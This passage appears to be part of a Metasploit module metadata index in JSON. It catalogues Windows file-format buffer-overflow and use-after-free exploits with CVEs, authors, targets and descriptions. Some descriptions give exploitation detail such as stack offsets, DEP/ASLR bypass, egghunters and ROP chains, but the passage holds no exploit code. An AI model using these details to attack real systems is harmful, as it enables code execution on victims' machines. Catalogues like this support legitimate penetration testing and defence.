"James Fitts",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a buffer overflow vulnerability found in ERS Viewer 2013.\n The vulnerability exists in the module ermapper_u.dll, where the function\n rf_report_error handles user provided data in an insecure way. It results in\n arbitrary code execution under the context of the user viewing a specially crafted\n .ers file. This module has been tested successfully with ERS Viewer 2013 (versions\n 13.0.0.1151) on Windows XP SP3 and Windows 7 SP1.",
"references": [
"CVE-2013-3482",
"OSVDB-93650",
"URL-http://secunia.com/advisories/53620/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"ERS Viewer 2013 13.0.0.1151 / NO DEP / NO ASLR",
"ERS Viewer 2013 13.0.0.1151 / DEP & ASLR bypass"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/fileformat/erdas_er_viewer_rf_report_error.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/erdas_er_viewer_rf_report_error",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/esignal_styletemplate_bof": {
"name": "eSignal and eSignal Pro File Parsing Buffer Overflow in QUO",
"full_name": "exploit/windows/fileformat/esignal_styletemplate_bof",
"rank": 300,
"disclosure_date": "2011-09-06",
"type": "exploit",
"author": [
"Luigi Auriemma",
"TecR0c <tecr0c@tecninja.net>",
"mr_me <steventhomasseeley@gmai.com>"
],
"description": "The software is unable to handle the \"<StyleTemplate>\" files (even those\n original included in the program) like those with the registered\n extensions QUO, SUM and POR. Successful exploitation of this\n vulnerability may take up to several seconds due to the use of\n egghunter. Also, DEP bypass is unlikely due to the limited space for\n payload. This vulnerability affects versions 10.6.2425.1208 and earlier.",
"references": [
"CVE-2011-3494",
"OSVDB-75456",
"BID-49600",
"URL-http://aluigi.altervista.org/adv/esignal_1-adv.txt",
"EDB-17837"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Win XP SP3 / Windows Vista / Windows 7"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/esignal_styletemplate_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/esignal_styletemplate_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/etrust_pestscan": {
"name": "CA eTrust PestPatrol ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/fileformat/etrust_pestscan",
"rank": 200,
"disclosure_date": "2009-11-02",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in CA eTrust PestPatrol. When\n sending an overly long string to the Initialize() property of ppctl.dll (5.6.7.9)\n an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2009-4225",
"OSVDB-60862"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/etrust_pestscan.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/etrust_pestscan",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/ezip_wizard_bof": {
"name": "eZip Wizard 3.0 Stack Buffer Overflow",
"full_name": "exploit/windows/fileformat/ezip_wizard_bof",
"rank": 400,
"disclosure_date": "2009-03-09",
"type": "exploit",
"author": [
"fl0 fl0w",
"jduck <jduck@metasploit.com>",
"Lincoln"
],
"description": "This module exploits a stack-based buffer overflow vulnerability in\n version 3.0 of ediSys Corp.'s eZip Wizard.\n\n In order for the command to be executed, an attacker must convince someone to\n open a specially crafted zip file with eZip Wizard, and access the specially\n file via double-clicking it. By doing so, an attacker can execute arbitrary\n code as the victim user.",
"references": [
"CVE-2009-1028",
"OSVDB-52815",
"BID-34044",
"URL-http://www.edisys.com/",
"EDB-8180",
"EDB-12059"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/ezip_wizard_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/ezip_wizard_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/fatplayer_wav": {
"name": "Fat Player Media Player 0.6b0 Buffer Overflow",
"full_name": "exploit/windows/fileformat/fatplayer_wav",
"rank": 300,
"disclosure_date": "2010-10-18",
"type": "exploit",
"author": [
"James Fitts <fitts.james@gmail.com>",
"dookie"
],
"description": "This module exploits a buffer overflow in Fat Player 0.6b. When\n the application is used to import a specially crafted wav file, a buffer overflow occurs\n allowing arbitrary code execution.",
"references": [
"CVE-2009-4962",
"OSVDB-57343",
"EDB-15279"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/fatplayer_wav.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/fatplayer_wav",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/fdm_torrent": {
"name": "Free Download Manager Torrent Parsing Buffer Overflow",
"full_name": "exploit/windows/fileformat/fdm_torrent",
"rank": 400,
"disclosure_date": "2009-02-02",
"type": "exploit",
"author": [
"SkD <skdrat@hotmail.com>",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Free Download Manager\n 3.0 Build 844. Arbitrary code execution could occur when parsing a\n specially crafted torrent file.",
"references": [
"CVE-2009-0184",
"OSVDB-54033",
"BID-33555",
"URL-http://freedownload.svn.sourceforge.net/viewvc/freedownload/FDM/vmsBtDownloadManager.cpp?r1=11&r2=18",
"URL-http://freedownload.svn.sourceforge.net/viewvc/freedownload/FDM/Bittorrent/fdmbtsupp/vmsBtFileImpl.cpp?r1=9&r2=18",
"URL-http://secunia.com/secunia_research/2009-5/",
"URL-http://downloads.securityfocus.com/vulnerabilities/exploits/33555-SkD.pl"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Free Download Manager 3.0 (Build 844)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/fdm_torrent.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/fdm_torrent",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/feeddemon_opml": {
"name": "FeedDemon Stack Buffer Overflow",
"full_name": "exploit/windows/fileformat/feeddemon_opml",
"rank": 500,
"disclosure_date": "2009-02-09",
"type": "exploit",
"author": [
"fl0 fl0w",
"dookie",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a buffer overflow in FeedDemon v3.1.0.12. When the application\n is used to import a specially crafted opml file, a buffer overflow occurs allowing\n arbitrary code execution.\n\n All versions are suspected to be vulnerable. This vulnerability was originally reported\n against version 2.7 in February of 2009.",
"references": [
"CVE-2009-0546",
"OSVDB-51753",
"BID-33630",
"EDB-7995",
"EDB-8010",
"EDB-11379"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/feeddemon_opml.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/feeddemon_opml",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/foxit_reader_filewrite": {
"name": "Foxit PDF Reader 4.2 Javascript File Write",
"full_name": "exploit/windows/fileformat/foxit_reader_filewrite",
"rank": 300,
"disclosure_date": "2011-03-05",
"type": "exploit",
"author": [
"bannedit <bannedit@metasploit.com>",
"Chris Evans"
],
"description": "This module exploits an unsafe Javascript API implemented in Foxit PDF Reader\n version 4.2. The createDataObject() Javascript API function allows for writing\n arbitrary files to the file system. This issue was fixed in version 4.3.1.0218.\n\n Note: This exploit uses the All Users directory currently, which required\n administrator privileges to write to. This means an administrative user has to\n open the file to be successful. Kind of lame but thats how it goes sometimes in\n the world of file write bugs.",
"references": [
"OSVDB-71104",
"URL-http://scarybeastsecurity.blogspot.com/2011/03/dangerous-file-write-bug-in-foxit-pdf.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Foxit PDF Reader v4.2 (Windows XP SP0-SP3)",
"Foxit PDF Reader v4.2 (Windows Vista/7/8/2008)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/foxit_reader_filewrite",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/foxit_reader_launch": {
"name": "Foxit Reader 3.0 Open Execute Action Stack Based Buffer Overflow",
"full_name": "exploit/windows/fileformat/foxit_reader_launch",
"rank": 400,
"disclosure_date": "2009-03-09",
"type": "exploit",
"author": [
"Francisco Falcon",
"bannedit <bannedit@metasploit.com>"
],
"description": "This module exploits a buffer overflow in Foxit Reader 3.0 builds 1301 and earlier.\n Due to the way Foxit Reader handles the input from an \"Launch\" action, it is possible\n to cause a stack-based buffer overflow, allowing an attacker to gain arbitrary code\n execution under the context of the user.",
"references": [
"CVE-2009-0837",
"OSVDB-55614",
"BID-34035",
"URL-http://www.coresecurity.com/content/foxit-reader-vulnerabilities"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Foxit Reader 3.0 Windows XP SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/foxit_reader_launch.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/foxit_reader_launch",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/foxit_reader_uaf": {
"name": "Foxit PDF Reader Pointer Overwrite UAF",
"full_name": "exploit/windows/fileformat/foxit_reader_uaf",
"rank": 300,
"disclosure_date": "2018-04-20",
"type": "exploit",
"author": [
"mr_me",
"bit from meepwn",
"saelo",
"Jacob Robles"
],
"description": "Foxit PDF Reader v9.0.1.1049 has a Use-After-Free vulnerability\n in the Text Annotations component and the TypedArray's use\n uninitialized pointers.\n\n The vulnerabilities can be combined to leak a vtable memory address,\n which can be adjusted to point to the base address of the executable.\n A ROP chain can be constructed that will execute when Foxit Reader\n performs the UAF.\n\n This module has been tested on Windows 7 x64, Windows 10 Pro x64\n Build 17134, and Windows 10 Enterprise x64. Windows 10 Enterprise\n must have insecure logons enabled for the exploit to work as expected.",
"references": [
"CVE-2018-9948",
"CVE-2018-9958",
"ZDI-18-332",
"ZDI-18-342",
"URL-https://srcincite.io/blog/2018/06/22/foxes-among-us-foxit-reader-vulnerability-discovery-and-exploitation.html",
"URL-https://srcincite.io/pocs/cve-2018-99{48,58}.pdf.txt"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 10 Pro x64 Build 17134"
],
"mod_time": "2018-09-05 21:47:57 +0000",
"path": "/modules/exploits/windows/fileformat/foxit_reader_uaf.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/foxit_reader_uaf",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/foxit_title_bof": {
"name": "Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow",
"full_name": "exploit/windows/fileformat/foxit_title_bof",
"rank": 500,
"disclosure_date": "2010-11-13",
"type": "exploit",
"author": [
"dookie",
"Sud0",
"corelanc0d3r <peter.ve@corelan.be>",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Foxit PDF Reader prior to version\n 4.2.0.0928. The vulnerability is triggered when opening a malformed PDF file that\n contains an overly long string in the Title field. This results in overwriting a\n structured exception handler record.\n\n NOTE: This exploit does not use javascript.",
"references": [
"OSVDB-68648",
"EDB-15532",
"URL-http://www.corelan.be:8800/index.php/2010/11/13/offensive-security-exploit-weekend/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Foxit Reader v4.1.1 XP Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/foxit_title_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/foxit_title_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/free_mp3_ripper_wav": {
"name": "Free MP3 CD Ripper 1.1 WAV File Stack Buffer Overflow",
"full_name": "exploit/windows/fileformat/free_mp3_ripper_wav",
"rank": 500,
"disclosure_date": "2011-08-27",
"type": "exploit",
"author": [
"Richard Leahy",
"X-h4ck",
"Tiago Henriques",
"James Fitts <fitts.james@gmail.com>"
],
"description": "This module exploits a stack based buffer overflow found in Free MP3 CD\n Ripper 1.1. The overflow is triggered when an unsuspecting user opens a malicious\n WAV file.",
"references": [
"CVE-2011-5165",
"OSVDB-63349",
"EDB-11975",
"EDB-17727"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP3 EN"
],
"mod_time": "2018-07-08 18:46:04 +0000",
"path": "/modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/free_mp3_ripper_wav",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/galan_fileformat_bof": {
"name": "gAlan 0.2.1 Buffer Overflow",
"full_name": "exploit/windows/fileformat/galan_fileformat_bof",
"rank": 300,
"disclosure_date": "2009-12-07",
"type": "exploit",
"author": [
"Jeremy Brown <0xjbrown41@gmail.com>",
"loneferret"
],
"description": "This module exploits a stack buffer overflow in gAlan 0.2.1\n by creating a specially crafted galan file.",
"references": [
"OSVDB-60897",
"EDB-10339"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/galan_fileformat_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/galan_fileformat_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/gsm_sim": {
"name": "GSM SIM Editor 5.15 Buffer Overflow",
"full_name": "exploit/windows/fileformat/gsm_sim",
"rank": 300,
"disclosure_date": "2010-07-07",
"type": "exploit",
"author": [
"Ruben Alejandro",
"chap0 <contact.chap0@gmail.com>",
"Lincoln <lincoln@corelan.be>"
],
"description": "This module exploits a stack-based buffer overflow in GSM SIM Editor 5.15.\n When opening a specially crafted .sms file in GSM SIM Editor a stack-based buffer\n overflow occurs which allows an attacker to execute arbitrary code.",
"references": [
"CVE-2015-1171",
"OSVDB-81161",
"EDB-14258"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP3"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/windows/fileformat/gsm_sim.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/gsm_sim",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/gta_samp": {
"name": "GTA SA-MP server.cfg Buffer Overflow",
"full_name": "exploit/windows/fileformat/gta_samp",
"rank": 300,
"disclosure_date": "2011-09-18",
"type": "exploit",
"author": [
"Silent_Dream"
],
"description": "This module exploits a stack-based buffer overflow in GTA SA-MP Server.\n This buffer overflow occurs when the application attempts to open a malformed\n server.cfg file. To exploit this vulnerability, an attacker must send the\n victim a server.cfg file and have them run samp-server.exe.",
"references": [
"OSVDB-83433",
"EDB-17893"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"GTA SA-MP (samp-server) v0.3.1.1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/gta_samp.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/gta_samp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/hhw_hhp_compiledfile_bof": {
"name": "HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow",
"full_name": "exploit/windows/fileformat/hhw_hhp_compiledfile_bof",
"rank": 400,
"disclosure_date": "2006-02-06",
"type": "exploit",
"author": [
"bratax",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in HTML Help Workshop 4.74\n By creating a specially crafted hhp file, an attacker may be able\n to execute arbitrary code.",
"references": [
"CVE-2006-0564",
"OSVDB-22941",
"EDB-1488",
"EDB-1490"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP English SP3"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/hhw_hhp_compiledfile_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/hhw_hhp_contentfile_bof": {
"name": "HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow",
"full_name": "exploit/windows/fileformat/hhw_hhp_contentfile_bof",
"rank": 400,
"disclosure_date": "2006-02-06",
"type": "exploit",
"author": [
"bratax",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in HTML Help Workshop 4.74\n by creating a specially crafted hhp file.",
"references": [
"CVE-2006-0564",
"OSVDB-22941",
"EDB-1470",
"EDB-1495"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP English SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/hhw_hhp_contentfile_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/hhw_hhp_indexfile_bof": {
"name": "HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow",
"full_name": "exploit/windows/fileformat/hhw_hhp_indexfile_bof",
"rank": 400,
"disclosure_date": "2009-01-17",
"type": "exploit",
"author": [
"Encrypt3d.M!nd",
"loneferret",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in HTML Help Workshop 4.74\n by creating a specially crafted hhp file.",
"references": [
"CVE-2009-0133",
"BID-33189",
"OSVDB-22941",
"EDB-10323",
"EDB-10335"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP English SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/hhw_hhp_indexfile_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/homm3_h3m": {
"name": "Heroes of Might and Magic III .h3m Map file Buffer Overflow",
"full_name": "exploit/windows/fileformat/homm3_h3m",
"rank": 300,
"disclosure_date": "2015-07-29",
"type": "exploit",
"author": [
"Pierre Lindblad",
"John AAkerblom"
],
"description": "This module embeds an exploit into an uncompressed map file (.h3m) for\n Heroes of Might and Magic III. Once the map is started in-game, a\n buffer overflow occurring when loading object sprite names leads to\n shellcode execution.",
"references": [
"EDB-37716"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"H3 Complete 4.0.0.0 [Heroes3.exe 78956DFAB3EB8DDF29F6A84CF7AD01EE]",
"HD Mod 3.808 build 9 [Heroes3 HD.exe 56614D31CC6F077C2D511E6AF5619280]",
"Heroes III Demo 1.0.0.0 [h3demo.exe 522B6F45F534058D02A561838559B1F4]"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/fileformat/homm3_h3m.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/homm3_h3m",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/ht_mp3player_ht3_bof": {
"name": "HT-MP3Player 1.0 HT3 File Parsing Buffer Overflow",
"full_name": "exploit/windows/fileformat/ht_mp3player_ht3_bof",
"rank": 400,
"disclosure_date": "2009-06-29",
"type": "exploit",
"author": [
"hack4love <hack4love@hotmail.com>",
"His0k4",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in HT-MP3Player 1.0.\n Arbitrary code execution could occur when parsing a specially crafted\n .HT3 file.\n\n NOTE: The player installation does not register the file type to be\n handled. Therefore, a user must take extra steps to load this file.",
"references": [
"CVE-2009-2485",
"OSVDB-55449",
"EDB-9034",
"EDB-9038"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"HT-MP3Player 1.0"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/ht_mp3player_ht3_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/ht_mp3player_ht3_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/ibm_forms_viewer_fontname": {
"name": "IBM Forms Viewer Unicode Buffer Overflow",
"full_name": "exploit/windows/fileformat/ibm_forms_viewer_fontname",
"rank": 300,
"disclosure_date": "2013-12-05",
"type": "exploit",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow in IBM Forms Viewer. The vulnerability\n is due to a dangerous usage of a strcpy-like function, and occurs while parsing malformed\n XFDL files containing a long fontname value. This module has been tested successfully on IBM\n Forms Viewer 4.0 on Windows XP SP3 and Windows 7 SP1.",
"references": [
"CVE-2013-5447",
"OSVDB-100732",
"ZDI-13-274",
"URL-http://www-01.ibm.com/support/docview.wss?uid=swg21657500"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"IBM Forms Viewer 4.0 / Windows XP SP3 / Windows 7 SP1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/ibm_forms_viewer_fontname.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/ibm_forms_viewer_fontname",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/ibm_pcm_ws": {
"name": "IBM Personal Communications iSeries Access WorkStation 5.9 Profile",
"full_name": "exploit/windows/fileformat/ibm_pcm_ws",
"rank": 500,
"disclosure_date": "2012-02-28",
"type": "exploit",
"author": [
"TecR0c <roccogiovannicalvi@gmail.com>"
],
"description": "The IBM Personal Communications I-Series application WorkStation is susceptible to a\n stack-based buffer overflow vulnerability within file parsing in which data copied to a\n location in memory exceeds the size of the reserved destination area. The buffer is located\n on the runtime program stack.\n\n When the WorkStation file is opened it will reach the code path at 0x67575180 located in\n pcspref.dll which conducts string manipulation and validation on the data supplied in the\n WorkStation file. The application will first check if 'Profile' header exists and appends\n a dot with the next parameter within the file. It will then measure the character length\n of the header by calling strcspn with a dot as its null-terminated character.\n\n It will then write the header into memory and ensure the header ends with a NUL character.\n The parameter character array is passed to the strcpy() function. The application has\n declared a 52-element character array for the destination for strcpy function. The\n function does not perform bounds checking therefore, data can be written paste the end of\n the buffer variable resulting in corruption of adjacent variables including other local\n variables, program state information and function arguments. You will notice that the\n saved RETURN address at offset 0x6c is overwritten by the data written past the buffer.\n\n To ensure we can perform arbitrary code execution we must we provide a valid pointer at\n 0x74 which is used as an argument for the called function at 0x675751ED as an id file\n extension parameter. Once the caller regains control we will reach our RETURN. The Ret\n instruction will be used to pop the overwritten saved return address which was corrupted.\n\n This exploit has been written to bypass 2 mitigations DEP and ASLR on a Windows platform.\n\n Versions tested:\n IBM System i Access for Windows V6R1M0 version 06.01.0001.0000a\n Which bundles pcsws.exe version 5090.27271.709\n\n Tested on:\n Microsoft Windows XP [Version 5.1.2600]\n Microsoft Windows Vista [Version 6.0.6002]\n Microsoft Windows 7 [Version 6.1.7600]",
"references": [
"CVE-2012-0201",
"OSVDB-79657",
"URL-https://www-304.ibm.com/support/docview.wss?uid=swg21586166"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"IBM WorkStation 5.9 (Windows XP SP3)",
"IBM WorkStation 5.9 (Windows 7, Windows Vista)"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/fileformat/ibm_pcm_ws.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/ibm_pcm_ws",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/icofx_bof": {
"name": "IcoFX Stack Buffer Overflow",
"full_name": "exploit/windows/fileformat/icofx_bof",
"rank": 300,
"disclosure_date": "2013-12-10",
"type": "exploit",
"author": [
"Marcos Accossatto",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow vulnerability in version 2.1\n of IcoFX. The vulnerability exists while parsing .ICO files, where a specially\n crafted ICONDIR header providing an arbitrary long number of images in the file\n can be used to trigger the overflow when reading the ICONDIRENTRY structures.",
"references": [
"CVE-2013-4988",
"OSVDB-100826",
"BID-64221",
"EDB-30208",
"URL-http://www.coresecurity.com/advisories/icofx-buffer-overflow-vulnerability"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"IcoFX 2.5 / Windows 7 SP1"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/fileformat/icofx_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/icofx_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/ideal_migration_ipj": {
"name": "PointDev IDEAL Migration Buffer Overflow",
"full_name": "exploit/windows/fileformat/ideal_migration_ipj",
"rank": 500,
"disclosure_date": "2009-12-05",
"type": "exploit",
"author": [
"Dr_IDE",
"dookie",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in versions v9.7\n through v10.5 of IDEAL Administration and versions 4.5 and 4.51 of\n IDEAL Migration. All versions are suspected to be vulnerable.\n By creating a specially crafted ipj file, an attacker may be able\n to execute arbitrary code.\n\n NOTE: IDEAL Administration 10.5 is compiled with /SafeSEH",
"references": [
"CVE-2009-4265",
"OSVDB-60681",
"EDB-10319",
"EDB-12403",
"EDB-12404",
"EDB-12540"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"IDEAL Migration <= 4.5.1 on Windows XP",
"IDEAL Administration <= 10.5 on Windows XP"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/fileformat/ideal_migration_ipj.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/ideal_migration_ipj",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/iftp_schedule_bof": {
"name": "i-FTP Schedule Buffer Overflow",
"full_name": "exploit/windows/fileformat/iftp_schedule_bof",
"rank": 300,
"disclosure_date": "2014-11-06",
"type": "exploit",
"author": [
"metacom",
"Gabor Seljan"
],
"description": "This module exploits a stack-based buffer overflow vulnerability in\n i-Ftp v2.20, caused by a long time value set for scheduled download.\n\n By persuading the victim to place a specially-crafted Schedule.xml file\n in the i-FTP folder, a remote attacker could execute arbitrary code on\n the system or cause the application to crash. This module has been\n tested successfully on Windows XP SP3.",
"references": [
"EDB-35177",
"OSVDB-114279"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/iftp_schedule_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/iftp_schedule_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/irfanview_jpeg2000_bof": {
"name": "Irfanview JPEG2000 jp2 Stack Buffer Overflow",
"full_name": "exploit/windows/fileformat/irfanview_jpeg2000_bof",
"rank": 300,
"disclosure_date": "2012-01-16",
"type": "exploit",
"author": [
"Parvez Anwar <parvez@greyhathacker.net>",
"mr_me <steventhomasseeley@gmail.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a stack-based buffer overflow vulnerability in\n version <= 4.3.2.0 of Irfanview's JPEG2000.dll plugin. This exploit has\n been tested on a specific version of irfanview (v4.3.2), although other\n versions may work also. The vulnerability is triggered via parsing an\n invalid qcd chunk structure and specifying a malformed qcd size and\n data.\n\n Payload delivery and vulnerability trigger can be executed in multiple\n ways. The user can double click the file, use the file dialog, open via\n the icon and drag/drop the file into Irfanview's window. An egg hunter\n is used for stability.",
"references": [
"CVE-2012-0897",
"OSVDB-78333",
"BID-51426",
"URL-http://www.greyhathacker.net/?p=525"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
